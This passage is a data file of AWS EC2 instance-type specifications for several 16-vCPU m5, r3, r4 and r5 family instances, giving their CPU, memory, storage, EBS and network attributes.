'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.4}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2000, 'BaselineThroughputInMBps': 250.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2000, 'MaximumThroughputInMBps': 250.0, 'MaximumIops': 16000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 18750, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 
'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 18750, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 
'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2880, 'BaselineThroughputInMBps': 360.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5a.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2880, 'BaselineThroughputInMBps': 360.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 
'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'TotalSizeInGB': 600, 'Disks': [{'SizeInGB': 300, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2880, 'BaselineThroughputInMBps': 360.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5ad.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 
'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 600, 'Disks': [{'SizeInGB': 300, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2880, 'BaselineThroughputInMBps': 360.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'TotalSizeInGB': 600, 'Disks': [{'SizeInGB': 300, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 18750, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 
'MaximumIops': 18750}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5d.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 600, 'Disks': [{'SizeInGB': 300, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 18750, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': 
{'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 124928, 'TotalSizeInGB': 320, 'Disks': [{'SizeInGB': 320, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2000, 'BaselineThroughputInMBps': 250.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2000, 'MaximumThroughputInMBps': 250.0, 'MaximumIops': 16000}, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r3.4xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 124928}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 320, 'Disks': [{'SizeInGB': 320, 'Count': 1, 'Type': 
'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2000, 'BaselineThroughputInMBps': 250.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2000, 'MaximumThroughputInMBps': 250.0, 'MaximumIops': 16000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 124928, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 3500, 'BaselineThroughputInMBps': 437.5, 'BaselineIops': 18750, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 18750}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 
'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r4.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 124928}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 3500, 'BaselineThroughputInMBps': 437.5, 'BaselineIops': 18750, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 18750}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 131072, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': 
{'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 18750, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 18750, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 
'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 131072, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2880, 'BaselineThroughputInMBps': 360.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5a.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2880, 'BaselineThroughputInMBps': 360.0, 
'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 131072, 'TotalSizeInGB': 600, 'Disks': [{'SizeInGB': 300, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2880, 'BaselineThroughputInMBps': 360.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5ad.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': 
False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 600, 'Disks': [{'SizeInGB': 300, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2880, 'BaselineThroughputInMBps': 360.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 131072, 'TotalSizeInGB': 600, 'Disks': [{'SizeInGB': 300, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 
